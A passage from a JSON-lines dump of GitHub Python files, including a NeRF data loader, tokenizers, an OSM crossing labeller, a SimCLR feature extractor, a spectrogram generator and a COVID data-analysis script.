queryset:\n # count = 0\n # pic(query) \n # if count < has_photos:\n # slug = query.slug\n # queryset = queryset.exclude(slug__iexact=slug)\n\n # open_house = data['open_house']\n # queryset = queryset.filter(open_house__iexact=open_house)\n\n # keywords = data['keywords']\n # queryset = queryset.filter(description_icontains=keywords)\n\n serializer = ListestatesSerializer(queryset, many = True)\n\n return Response(serializer.data)\n","repo_name":"statst/realestate-backend","sub_path":"listestates/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"41760779707","text":"from torch.utils.data import Dataset,DataLoader\nimport os\nimport natsort\nimport json\nimport numpy as np\nimport torch\nfrom PIL import Image\nfrom torchvision import transforms\nimport matplotlib.pyplot as plt\n\nclass MyDataset(Dataset): #return img,K,tfs\n def __init__(self,root_dir,half_res=True,is_train=True):\n super().__init__()\n self.root_dir=root_dir\n self.half_res=half_res\n self.is_train=is_train\n self.main_dir=self.root_dir+('train/' if is_train else 'test/')\n img_names=list(filter(lambda x:x.endswith('png'),os.listdir(self.main_dir)))\n self.imgs=natsort.natsorted(img_names)\n self.cam_fov,self.tfs=self._camparamGet()\n if self.half_res:\n self.transform=transforms.Compose([transforms.Resize((400,400)),transforms.ToTensor()])\n else:\n self.transform=transforms.Compose([transforms.ToTensor()])\n\n @staticmethod\n def jsonRead(path:str):\n with open(path,'r') as file:\n items=json.load(file)\n cam_fov=torch.tensor(items[\"camera_angle_x\"])\n print('Camera fov: %lf'%(cam_fov))\n tf_np=np.stack([frame[\"transform_matrix\"] for frame in items[\"frames\"]],axis=0)\n tfs=torch.from_numpy(tf_np).float()\n return cam_fov,tfs\n\n def _camparamGet(self):\n json_file=\"%stransforms_%s.json\"%(self.root_dir,\"train\" if self.is_train else \"test\")\n cam_fov,tfs=MyDataset.jsonRead(json_file)\n return cam_fov,tfs\n\n def cameraGet(self):\n return self.cam_fov,self.tfs\n\n def __len__(self):\n return len(self.imgs)\n\n def __getitem__(self, index):\n 
img_file=os.path.join(self.main_dir,self.imgs[index])\n image=Image.open(img_file).convert('RGB')\n img=self.transform(image)\n return img,self.tfs[index]\n\n def datasetGet(self):\n result=[]\n for im in self.imgs:\n img_name=os.path.join(self.main_dir,im)\n result.append(self.transform(Image.open(img_name).convert('RGB')))\n all_images=torch.stack(result,dim=0)\n return self.cam_fov,self.tfs,all_images\n\nif __name__==\"__main__\":\n dataset=MyDataset('./lego/',half_res=True,is_train=True)\n print(type(dataset))\n trainloader=DataLoader(dataset,batch_size=8,shuffle=True,num_workers=4)\n for i,(img,tfs) in enumerate(trainloader):\n for i in range(3):\n plt.subplot(1,3,i+1)\n pic_name='picture/'+str(i)+'.png'\n plt.savefig(pic_name)\n plt.imshow(img[i].permute(1,2,0))\n \n print(img.size())\n print(tfs.size())\n break\n plt.show()\n\n\n","repo_name":"sleep2hours/NerF","sub_path":"lego_loder.py","file_name":"lego_loder.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"38817981577","text":"from rest_framework import routers\n\nfrom subscription.views import ArtistSubscriptionViewSet, ChannelSubscriptionViewSet\n\napp_name = \"subscription\"\n\nrouter = routers.DefaultRouter()\nrouter.register(\n \"artist-subscription\", ArtistSubscriptionViewSet, basename=\"artist-subscription\"\n)\nrouter.register(\n \"channel-subscription\", ChannelSubscriptionViewSet, basename=\"channel-subscription\"\n)\n\nurlpatterns = router.urls\n","repo_name":"TywinEvergreen/feeder","sub_path":"subscription/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"16127882619","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, cast\n\nfrom mesa import Agent\n\nfrom bonding_curve_simulator.globals import BaseModel\nfrom bonding_curve_simulator.market.exchange.types import WealthConfig\nfrom bonding_curve_simulator.market.growth_curves import (\n CurveConfig,\n curve_type_function,\n)\n\nif TYPE_CHECKING:\n from bonding_curve_simulator.mesa.simulation_model import SimulationModel\n\n\nclass CreatorAgentConfig(BaseModel):\n wealth_config: WealthConfig = WealthConfig()\n curve_config: CurveConfig = CurveConfig()\n\n\nclass CreatorAgent(Agent):\n def __init__(\n self,\n unique_id,\n model,\n config: CreatorAgentConfig,\n ):\n super().__init__(unique_id, model)\n self.reserve = config.wealth_config.reserve\n self.supply = config.wealth_config.supply\n self.growth_curve = curve_type_function[config.curve_config.curve_type](\n config.curve_config.curve_params\n )\n\n def step(self):\n if TYPE_CHECKING:\n model = cast(SimulationModel, self.model)\n else:\n model = self.model\n\n steps = model.schedule.steps\n\n if steps % 30 == 0:\n self.reserve += self.growth_curve(steps)\n model.exchange.buy(self, self.reserve)\n","repo_name":"stonkify/bonding-curve-simulator","sub_path":"bonding_curve_simulator/mesa/agent/creator.py","file_name":"creator.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"11428853575","text":"'''\r\nBoJ 15650 Silver 3 Backtracking\r\nN과 M(2)\r\n'''\r\nimport sys\r\n\r\n\r\ndef solve(A, x):\r\n if len(A) == M:\r\n print(' '.join(map(str, A)))\r\n return\r\n\r\n for i in range(x, N):\r\n if num[i] not in A:\r\n A.append(num[i])\r\n solve(A, i)\r\n 
A.pop()\r\n\r\n\r\nN, M = map(int, sys.stdin.readline().rstrip().split())\r\nnum = [i for i in range(1, N+1)]\r\n\r\nfor i in num:\r\n answer = [i]\r\n solve(answer, i)\r\n","repo_name":"seungmin8606/Algorithm","sub_path":"Backtracking/boj15650.py","file_name":"boj15650.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"27195737040","text":"import tiktoken\n\n\nclass SimpleTokenizer:\n \"\"\"Tokenizes text by character\"\"\"\n CHAR = \"char\"\n WORD = \"word\"\n\n def __init__(self, tokenizer_type, *, vocab=None, text=None):\n self.tokenizer_type = tokenizer_type\n self.vocab = vocab or self._parse_vocab(text)\n self.n_vocab = len(self.vocab)\n self.ch_to_token = {ch: i for i, ch in enumerate(self.vocab)}\n self.token_to_ch = {i: ch for i, ch in enumerate(self.vocab)}\n\n def encode(self, string):\n try:\n return [self.ch_to_token[c] for c in string]\n except KeyError as e:\n raise TokenizerException(f\"Unable to encode string, unknown character: {e}\")\n\n def decode(self, tokens):\n try:\n return \"\".join([self.token_to_ch[token] for token in tokens])\n except KeyError as e:\n raise TokenizerException(f\"Unable to decode tokens, unknown character for {e}\")\n\n def _parse_vocab(self, text):\n if text is None:\n raise Exception(\"No text available to generate tokenizer\")\n\n if self.tokenizer_type == SimpleTokenizer.CHAR:\n vocab_set = set(text)\n elif self.tokenizer_type == SimpleTokenizer.WORD:\n special = \"\\n !$&',-.3:;?\"\n vocab_set = set()\n for line in text.split(\"\\n\"):\n for word in line.split(\" \"):\n for char in special:\n word = word.replace(char, \"\")\n vocab_set.add(word)\n for char in special:\n vocab_set.add(char)\n\n return sorted(list(vocab_set))\n\n\nclass CharTokenizer(SimpleTokenizer):\n def __init__(self, *, vocab=None, text=None):\n super().__init__(SimpleTokenizer.CHAR, vocab=vocab, text=text)\n\n\nclass WordTokenizer(SimpleTokenizer):\n def __init__(self, *, vocab=None, text=None):\n self.vocab = vocab or self._parse_vocab(text)\n print(\" \".join(self.vocab))\n self.n_vocab = len(self.vocab)\n print(self.n_vocab)\n self.ch_to_token = {ch: i for i, ch in enumerate(self.vocab)}\n self.token_to_ch = {i: ch for i, ch in enumerate(self.vocab)}\n\n def encode(self, string):\n try:\n return [self.ch_to_token[c] for c in self.gen_word(string)]\n except KeyError as e:\n raise TokenizerException(f\"Unable to encode string, unknown character: {e}\")\n\n def decode(self, tokens):\n try:\n return \"\".join([self.token_to_ch[token] for token in tokens])\n except KeyError as e:\n raise TokenizerException(f\"Unable to decode tokens, unknown character for {e}\")\n\n def gen_word(self, text):\n special = [ch for ch in \"\\n !$&',-.3:;?\"]\n for line in text.split(\"\\n\"):\n for word in line.split(\" \"):\n punct = []\n while len(word) > 1 and word[-1] in special:\n punct = [word[-1], *punct]\n word = word[0:-1]\n yield word\n for p in punct:\n yield p\n yield \" \"\n yield \"\\n\"\n\n def _parse_vocab(self, text):\n if text is None:\n raise Exception(\"No text available to generate tokenizer\")\n vocab_set = {word for word in self.gen_word(text)}\n return sorted(list(vocab_set))\n\n\nclass TikTokenTokenizer:\n def __init__(self, encoding=\"r50k_base\"):\n self.encoding = tiktoken.get_encoding(encoding)\n self.n_vocab = self.encoding.n_vocab\n\n def encode(self, string):\n return self.encoding.encode(string)\n\n def decode(self, tokens):\n return 
self.encoding.decode(tokens)\n\n\nclass TokenizerException(Exception):\n pass\n","repo_name":"ChadBowman/ChadGPT","sub_path":"transformer/tokenizer.py","file_name":"tokenizer.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"72436851335","text":"import math\n\ndef sqrt1(a, x):\n\tepsilon = 0.0001\n\ty = (x + a/x) / 2\n\tif abs(x - y) < epsilon:\n\t\treturn y\n\treturn sqrt1(a, y)\n\nprint(sqrt1(5, 2))\nprint(math.sqrt(4))\nprint(sum([1,2]))\n\ndef my_fun(k):\n\treturn ( math.factorial(4*k) * (1103 + 26390*k) ) / ( (math.factorial(k) ** 4) * (396 ** (4*k) ) )\ndef my_pi(k):\n\ta = (2 * math.sqrt(2)) / 9801\n\ts = sum([my_fun(x) for x in range(k)])\n\treturn 1 / (a * s)\n\nprint(math.pi)\nprint(my_pi(11))\n\ns = 'spam'\nt = list(s)\nprint(t)\n\nverb = dict()\nverb['cat'] = '555'\n\n\ndef hist(s):\n\td = dict()\n\tfor c in s:\n\t\tif c not in d:\n\t\t\td[c] = 1\n\t\telse:\n\t\t\td[c] = d[c] + 1\n\treturn d\n\nprint(hist('brontosaurus'))\n\ndef invert_dict(d):\n\tinverse = dict()\n\tfor key in d:\n\t\tval = d[key]\n\t\tif val not in inverse:\n\t\t\tinverse[val] = [key]\n\t\telse:\n\t\t\tinverse[val].append(key)\n\treturn inverse\n\nprint(invert_dict(hist('brontosaurus')))","repo_name":"chavp/MyPython","sub_path":"ThinkPython/Iteration.py","file_name":"Iteration.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"18005093886","text":"from imposm.parser import OSMParser\nimport json\n\n\n# simple class that handles the parsed OSM data.\nclass OSMCounter(object):\n relationDic = {} #{osmid:(tag, refs)}\n coordDic = {} #{osmid:(lat, lon)}\n nodeDic = {} #{osmid:(tag, coordinary)}\n wayDic = {} #{osmid:(tag, refs)}\n crossing_count = 0\n\n # osmid : do write the way's osmid to the result file ?\n # tag : do write the tag to the result ?\n # refs_index: select the index of refs you want\n # coordinate: write the coordinate of the refs to result file or only the refs ?\n def prepare_classify_data(self, input, output):\n\n for line in input.readlines():\n line = line.strip()\n osmid_vector = line.split(' ')\n osmid, node_vec = osmid_vector[0], osmid_vector[1:]\n if len(node_vec) < 10:\n output.write(line.strip() + '\\n')\n continue\n if osmid in self.nodeDic.keys():\n node_tags = self.nodeDic[osmid][0]\n if 'crossing' in node_tags.keys():\n print('crossing key in the tag')\n output.write(line + ' ' + '1' + '\\n')\n self.crossing_count += 1\n elif 'highway' in node_tags.keys():\n if 'crossing' == node_tags['highway']:\n print('highway key and crossing value in the tag')\n output.write(line + ' ' + '1' + '\\n')\n self.crossing_count += 1\n else:\n print('this is not a crossing')\n output.write(line + ' ' + '-1' + '\\n')\n\n else:\n print('this is a coords')\n output.write(line + ' ' + '-1' + '\\n')\n else:\n output.write(line + ' ' + '-1' + '\\n')\n\n print(self.crossing_count)\n\n def count_node_in_way(self):\n node_osmid_dic = {} #{osmid:count,...)\n for osmid, (tags, refs) in self.wayDic.items():\n for node_osmid in refs:\n if node_osmid not in node_osmid_dic:\n node_osmid_dic[node_osmid] = 1\n else:\n node_osmid_dic[node_osmid] += 1\n\n for osmid, count in node_osmid_dic.items():\n if count > 6:\n print(osmid)\n\n\n\n def ways(self, ways):\n # callback method for ways\n for osmid, tags, refs in ways:\n if 'highway' in tags:\n self.wayDic[osmid] = (tags, refs)\n # self.wayDic[osmid] = (tag, 
refs)\n\n def nodes(self, nodes):\n # callback method for nodes\n for osmid, tags, coordinary in nodes:\n self.nodeDic[osmid] = (tags, coordinary)\n\n def coords(self, coords):\n # callback method for coords\n for osmid, lat, lon in coords:\n self.coordDic[osmid] = (lat, lon)\n\n def relations(self, relations):\n # callback method for relations\n for osmid, tags, refs in relations:\n self.relationDic[osmid] = (tags, refs)\n\n\n# instantiate counter and parser and start parsing Proto ways\ncounter = OSMCounter()\np = OSMParser(concurrency=4, ways_callback=counter.ways, nodes_callback=counter.nodes,\n coords_callback=counter.coords, relations_callback=counter.relations)\np.parse('Porto.osm.pbf')\n\nf_input = open(r'dataset/deepwalk_highway_64d.embeddings', 'r')\nf_output = open(r'dataset/deepwalk_highway_64d_labeled.embeddings', 'w+')\n\ncounter.prepare_classify_data(f_input, f_output)\ncounter.count_node_in_way()\n\nf_input.close()\nf_output.close()\n","repo_name":"Leo-Bright/OSMparser","sub_path":"tools/prepare_to_classify.py","file_name":"prepare_to_classify.py","file_ext":"py","file_size_in_byte":3592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"26421740657","text":"class pro():\n def three_sum_zero(self,n,l):\n size=n\n lst=l\n new_lst=[]\n for i in range(size-2):\n for j in range(i+1,size-1):\n for k in range(j+1,size):\n if lst[i]!=lst[j] and lst[j]!=lst[k] and lst[i]!=lst[k]:\n if lst[i]+lst[j]+lst[k]==0:\n new_lst.append([lst[i],lst[j],lst[k]])\n return new_lst\n\nn=int(input(\"enter size of list : \"))\nx=[]\nprint(\"enter {} numbers : \".format(n))\nfor i in range(n):\n temp=int(input())\n x.append(temp)\nprint(\"entered list : \")\nprint(x)\nprint()\na=pro()\nnew_lst=a.three_sum_zero(n,x)\nprint(\"after execution new list : \")\nprint(new_lst)","repo_name":"Deep455/Python-programs-ITW1","sub_path":"python_assignment_4/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"5106971513","text":"#!/usr/bin/env python\n\n# This script summarizes the error stats from the error table\n\nfrom __future__ import print_function\nimport sys\nimport json\nimport argparse\nimport hashlib\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import desc\nfrom data_models import Base, Job, Error\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"config\", help=\"The JSON config file to load.\")\nargs = parser.parse_args()\n\nconfig = {}\n\nwith open(args.config, 'r') as f:\n config = json.load(f)\n\nif not config.has_key('repos') or not config.has_key('database-url'):\n print(\"Error parsing config file!\")\n print(config)\n sys.exit(1)\n\nengine = create_engine(config['database-url'])\nSession = sessionmaker()\nSession.configure(bind=engine)\nsession = Session()\n\nfor repo in config['repos']:\n if not repo.has_key('path') or not repo.has_key('highlight-branches'):\n print(\"A repo entry is missing needed keys!\")\n print(repo)\n sys.exit(1)\n\n if repo.has_key('hash'):\n hash_id = repo['hash']\n else:\n hash_id = hashlib.md5(repo['path']).hexdigest()\n header = \"REPO : {0}, HASH: {1}\".format(repo['path'], hash_id)\n print(\"-\" * len(header))\n print(header)\n print(\"-\" * len(header))\n q = session.query(Error).filter(Error.repo_hash == hash_id)\n q = q.order_by(desc(Error.count))\n results = q.all()\n\n print(\" NUM_ERRORS\\tSTEP\")\n for result in 
results:\n print(\" {0}\\t\\t{1}\".format(result.count, result.step))\n\n print()\n","repo_name":"criswell/circle-stats","sub_path":"error-summarize.py","file_name":"error-summarize.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"10839557823","text":"# -*- coding: utf8 -*-\n\nFAKE_MODE = True\n\nTWITTER_ON = False\n\nLOW_LIGHT = False\n\nTAKE_PHOTO = False\n\nTWITTER_ACCOUNT = 'LaVieDePoule'\nTWITTER_ADMIN_ACCOUNT = 'hugokernel'\n\n'''\nAlert config (min, max)\n'''\nVOLTAGE_ALERT = (10, 16)\nCURRENT_ALERT = (0.15, 0.55)\nTEMP_ALERT = (-2, 37)\n\nVALID_BATT_VOLTAGE = (11.2, 12.9)\n\n'''\nOne wire sensor id\n'''\nONEWIRE_SENSOR0 = '28-000006a093e4' # Nid 2\nONEWIRE_SENSOR1 = '28-000006a087ef' # Nid 1\nONEWIRE_SENSOR2 = '28-0000061496ff' # Extérieur\n\nONEWIRE_SENSORS = [ ONEWIRE_SENSOR0, ONEWIRE_SENSOR1, ONEWIRE_SENSOR2 ]\n\n'''\nSensor max age\nValidity of sensor data\n'''\nMAX_AGE = 5 * 60\n\n'''\nSave to db every x seconds\n'''\nSAVE_TO_DB_EVERY = 60\n\n'''\nWeb server\n'''\nSERVER_ON = True\n\nSERVER_HOST = '127.0.0.1'\nSERVER_PORT = 5678\n\nSCAN_FOR_EGG = False\n\n'''\nDirectory of egg image detection\n'''\nEGG_IMAGE_DIRECTORY = '/home/pi/eggimage/'\n\n","repo_name":"hugokernel/LaVieDePoule","sub_path":"config/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"45"} +{"seq_id":"23079647082","text":"\"\"\"\nsgpu python eval.py /scratch/gobi1/datasets/imagenet -a resnet50-4x -b 32 -s train\n\"\"\"\nimport argparse\nimport os\nimport random\nimport shutil\nimport json\nimport warnings\nimport numpy as np\nfrom tqdm import tqdm\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nfrom resnet_wider import resnet50x1, resnet50x2, resnet50x4\n\nfrom my_dataset import ImageFolder\nimport ipdb\n\n\nmodel_names = sorted(name for name in models.__dict__\n if name.islower() and not name.startswith(\"__\")\n and callable(models.__dict__[name]))\n\nparser = argparse.ArgumentParser(description='PyTorch ImageNet Training')\nparser.add_argument('data', metavar='DIR',\n help='path to dataset')\nparser.add_argument('-a', '--arch', default='resnet50-1x')\nparser.add_argument('-s', '--split', default='train')\nparser.add_argument('-j', '--workers', default=8, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('-b', '--batch-size', default=256, type=int)\nparser.add_argument('--lr', '--learning-rate', default=0.1, type=float,\n metavar='LR', help='initial learning rate', dest='lr')\nparser.add_argument('-p', '--print-freq', default=10, type=int,\n metavar='N', help='print frequency (default: 10)')\n\nbest_acc1 = 0\n\n\ndef main():\n args = parser.parse_args()\n\n # create model\n if args.arch == 'resnet50-1x':\n model = resnet50x1()\n sd = 'resnet50-1x.pth'\n elif args.arch == 'resnet50-2x':\n model = resnet50x2()\n sd = 'resnet50-2x.pth'\n elif args.arch == 'resnet50-4x':\n model = resnet50x4()\n sd = 'resnet50-4x.pth'\n else:\n raise NotImplementedError\n\n sd = torch.load(sd, map_location='cpu')\n model.load_state_dict(sd['state_dict'])\n model.fc = Identity()\n\n model = torch.nn.DataParallel(model).to('cuda')\n 
cudnn.benchmark = True\n\n # Data loading code\n valdir = os.path.join(args.data, args.split)\n\n # NOTICE, the original model do not have normalization\n val_loader = torch.utils.data.DataLoader(\n ImageFolder(valdir, transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(256),\n transforms.ToTensor(),\n ]), return_path=True, split=\"1/3\"),\n batch_size=args.batch_size,\n shuffle=False,\n num_workers=args.workers,\n pin_memory=True)\n\n\n validate(val_loader, model, args)\n\n\ndef validate(val_loader, model, args):\n\n # switch to evaluate mode\n path_arr = []\n output_arr = []\n target_arr = []\n\n model.eval()\n\n with torch.no_grad():\n for i, (paths, images, targets) in tqdm(enumerate(val_loader)):\n\n # compute output\n output = model(images)\n path_arr.extend(paths)\n output_arr.append(output.cpu().numpy())\n target_arr.append(targets.cpu().numpy())\n if i % 100 == 0:\n print(\"{}/{}\".format(i, len(val_loader)))\n\n\n path_arr = np.array(path_arr)\n output_arr = np.concatenate(output_arr, 0)\n target_arr = np.concatenate(target_arr, 0)\n\n idx = list(val_loader.dataset.idx_to_class.keys())\n idx.sort()\n idx_to_class = np.array([val_loader.dataset.idx_to_class[i] for i in idx])\n np.savez(\"/scratch/gobi2/andrewliao/simclr/simclr-v1-{}-1/3\".format(args.split),\n path=path_arr,\n output=output_arr,\n target=target_arr,\n idx_to_class=idx_to_class)\n\n\nclass Identity(nn.Module):\n def __init__(self):\n super(Identity, self).__init__()\n\n def forward(self, x):\n return x\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"andrewliao11/simclr-converter","sub_path":"extract_features.py","file_name":"extract_features.py","file_ext":"py","file_size_in_byte":3897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"45"} +{"seq_id":"2133596243","text":"import os\r\n\r\nimport librosa\r\nimport librosa.display\r\nimport numpy as np\r\nimport pandas as pd\r\nimport torch\r\nfrom alive_progress import alive_bar\r\n\r\nimport src.data_process.spectrogram_debug as sdbg\r\n\r\ndefault_sample_rate = 44100\r\n\r\ntrack_ext = \".wav\"\r\n\r\n\r\ndef index_to_file_path(dataset_path: str, metadata: pd.DataFrame, index: int) -> str:\r\n \"\"\"\r\n Creates spectrogram for file in the dataset.\r\n :return: Spectrogram\r\n \"\"\"\r\n\r\n # Check if index is valid\r\n if index < 0 or index >= len(metadata):\r\n print(\"Index out of range\")\r\n return \"\"\r\n\r\n # Get row of index\r\n track_id = metadata.iloc[index][\"track_id\"]\r\n\r\n # Convert track_id to folder name\r\n folder_name = str(int(track_id / 1000)).zfill(3)\r\n\r\n # Convert track_id to filename, which is id aligned to 6 \"0\"s + \".wav\"\r\n file_name = str(track_id).zfill(6) + track_ext\r\n\r\n return os.path.join(dataset_path, folder_name, file_name)\r\n\r\n\r\ndef get_signal(file_path: str) -> np.ndarray:\r\n \"\"\"\r\n Loads signal from file.\r\n :return: Signal\r\n \"\"\"\r\n\r\n # Check if file exists\r\n if not os.path.isfile(file_path):\r\n print(\"File does not exist\")\r\n return None\r\n\r\n # Load file\r\n try:\r\n signal, sample_rate = librosa.load(file_path, sr=None)\r\n except RuntimeError:\r\n print(\"Error loading file\")\r\n return None\r\n\r\n return signal\r\n\r\n\r\ndef get_signal_by_index(\r\n dataset_path: str, metadata: pd.DataFrame, index: int\r\n) -> np.ndarray:\r\n \"\"\"\r\n Loads signal from file.\r\n :return: Signal\r\n \"\"\"\r\n\r\n # Generate file path\r\n file_path = index_to_file_path(dataset_path, metadata, index)\r\n\r\n return 
get_signal(file_path)\r\n\r\n\r\ndef generate_spectrogram(file_path: str, spectro_height: int = 128) -> np.ndarray:\r\n \"\"\"\r\n Creates a spectrogram for the given file.\r\n param file_path: Path to the file\r\n :return: Spectrogram\r\n \"\"\"\r\n\r\n # Check if file exists and has correct extension\r\n if not os.path.isfile(file_path):\r\n print(\"File does not exist\")\r\n return None\r\n\r\n if not file_path.endswith(track_ext):\r\n print(f\"File is not a {track_ext} file\")\r\n return None\r\n\r\n # Load file\r\n signal, sample_rate = librosa.load(file_path, sr=default_sample_rate)\r\n\r\n # Duplicate mono signal to stereo\r\n if signal.shape[0] == 1:\r\n torch.cat([signal, signal])\r\n\r\n # Generate spectrogram data\r\n sgram = librosa.stft(signal)\r\n sgram_mag = np.abs(sgram)\r\n mel_scale_sgram = librosa.feature.melspectrogram(\r\n S=sgram_mag, sr=sample_rate, power=1, n_mels=spectro_height\r\n )\r\n mel_sgram = librosa.amplitude_to_db(mel_scale_sgram, ref=np.min)\r\n\r\n return mel_sgram\r\n\r\n\r\ndef normalize_spectrogram(spectrogram: np.ndarray) -> np.ndarray:\r\n \"\"\"\r\n Normalizes mel dB spectrogram to [-1; 1] range.\r\n :return: Normalized spectrogram\r\n \"\"\"\r\n norm_spectrogram = 2 * librosa.util.normalize(spectrogram) - 1\r\n return norm_spectrogram\r\n\r\n\r\ndef generate_random_spectrogram(\r\n dataset_path: str, metadata: pd.DataFrame\r\n) -> np.ndarray:\r\n \"\"\"\r\n Creates spectrogram for random file in the dataset.\r\n :return: Spectrogram\r\n \"\"\"\r\n\r\n # Randomize track index\r\n random_index = np.random.randint(0, len(metadata))\r\n file_path = index_to_file_path(dataset_path, metadata, random_index)\r\n\r\n return generate_spectrogram(file_path)\r\n\r\n\r\ndef generate_spectrogram_by_index(\r\n dataset_path: str, metadata: pd.DataFrame, index: int\r\n) -> np.ndarray:\r\n \"\"\"\r\n Creates spectrogram for file in the dataset.\r\n :param dataset_path: path to the dataset\r\n :param metadata: metadata of the dataset\r\n :param index: index of the track\r\n :return: Spectrogram\r\n \"\"\"\r\n\r\n # Generate file path from index\r\n file_path = index_to_file_path(dataset_path, metadata, index)\r\n\r\n return generate_spectrogram(file_path)\r\n\r\n\r\ndef generate_all_spectrograms(\r\n dataset_path: str,\r\n metadata: pd.DataFrame,\r\n save_path: str,\r\n normalize: bool,\r\n spectro_height: int = 128,\r\n) -> None:\r\n \"\"\"\r\n Create spectrograms for all files in the dataset and save them to disk\r\n :param dataset_path: path to the dataset\r\n :param metadata: metadata of the dataset\r\n :param save_path: path to save spectrograms\r\n :param normalize: whether to normalize spectrograms\r\n :param spectro_height: height of the spectrogram\r\n \"\"\"\r\n\r\n # Create save path\r\n if not os.path.exists(save_path):\r\n os.makedirs(save_path)\r\n\r\n # Generate and save spectrogram\r\n with alive_bar(\r\n len(metadata), title=f\"Preparing spectrograms for {save_path}\"\r\n ) as bar:\r\n for index in range(len(metadata)):\r\n try:\r\n file_path = index_to_file_path(dataset_path, metadata, index)\r\n spectrogram = generate_spectrogram(file_path, spectro_height)\r\n if normalize:\r\n spectrogram = normalize_spectrogram(spectrogram)\r\n\r\n filename = str(metadata.iloc[index][\"track_id\"])\r\n save_file_path = os.path.join(save_path, filename)\r\n np.save(save_file_path, spectrogram)\r\n except TypeError:\r\n print(f\"Error generating spectrogram for file {index}\")\r\n\r\n 
bar()\r\n","repo_name":"DominikKwiatkowski/music-genre-recognition","sub_path":"src/data_process/spectrogram_generator.py","file_name":"spectrogram_generator.py","file_ext":"py","file_size_in_byte":5284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"33398683303","text":"import numpy\nfrom sqlalchemy import extract\nfrom json import JSONEncoder\nfrom datetime import datetime, timedelta\nimport json\nfrom sklearn.impute import KNNImputer\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom flask import Flask, jsonify, request\nfrom flask_cors import CORS\nimport pandas as pd\nimport numpy as np\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import func, and_\npd.set_option('max_rows', 10)\npd.plotting.register_matplotlib_converters()\n\n# %matplotlib inline\n\n\ncovid_data_path = \"C:\\\\Users\\\\UEA\\Desktop\\\\IV_Coursework\\\\IV_Backend\\\\owid-covid-data.csv\"\nswine_data_path = \"C:\\\\Users\\\\UEA\\Desktop\\\\IV_Coursework\\\\IV_Backend\\\\swine_flu.csv\"\nebola_data_path = \"C:\\\\Users\\\\UEA\\Desktop\\\\IV_Coursework\\\\IV_Backend\\\\ebola.csv\"\nsars_data_path = \"C:\\\\Users\\\\UEA\\Desktop\\\\IV_Coursework\\\\IV_Backend\\\\sars_2003.csv\"\nvaccinations_path = \"C:\\\\Users\\\\UEA\\Desktop\\\\IV_Coursework\\\\IV_Backend\\\\vaccinations.csv\"\ncovid_data = pd.read_csv(covid_data_path)\nswine_data = pd.read_csv(swine_data_path)\nebola_data = pd.read_csv(ebola_data_path)\nsars_data = pd.read_csv(sars_data_path)\nvaccinations_data = pd.read_csv(vaccinations_path)\n\n# Knn Imputer\nnan = np.nan\n\n# Designate the features to become X\nfeatures = ['Deaths']\nX = swine_data[features]\n# Apply KNN imputer\nimputer = KNNImputer(n_neighbors=2, weights=\"uniform\")\nImputedX = imputer.fit_transform(X)\n\n# Convert output to a data frame to show the stats\nimputed_df = pd.DataFrame.from_records(ImputedX)\nimputed_df.columns = features\nimputed_df['Country'] = swine_data['Country']\nimputed_df['Cases'] = swine_data['Cases']\nimputed_df['Update Time'] = swine_data['Update Time']\n\n\ninterested_features = [\n 'iso_code',\n 'continent',\n 'location',\n 'date',\n 'new_cases',\n 'new_deaths',\n 'new_tests',\n 'total_deaths',\n 'total_cases'\n]\nCleaned_SwineFrame = imputed_df\ncovid_data.dropna(subset=[\"continent\"], inplace=True)\ncovid_data.dropna(subset=[\"population\"], inplace=True)\nebola_data.dropna(\n subset=[\"Cumulative no. 
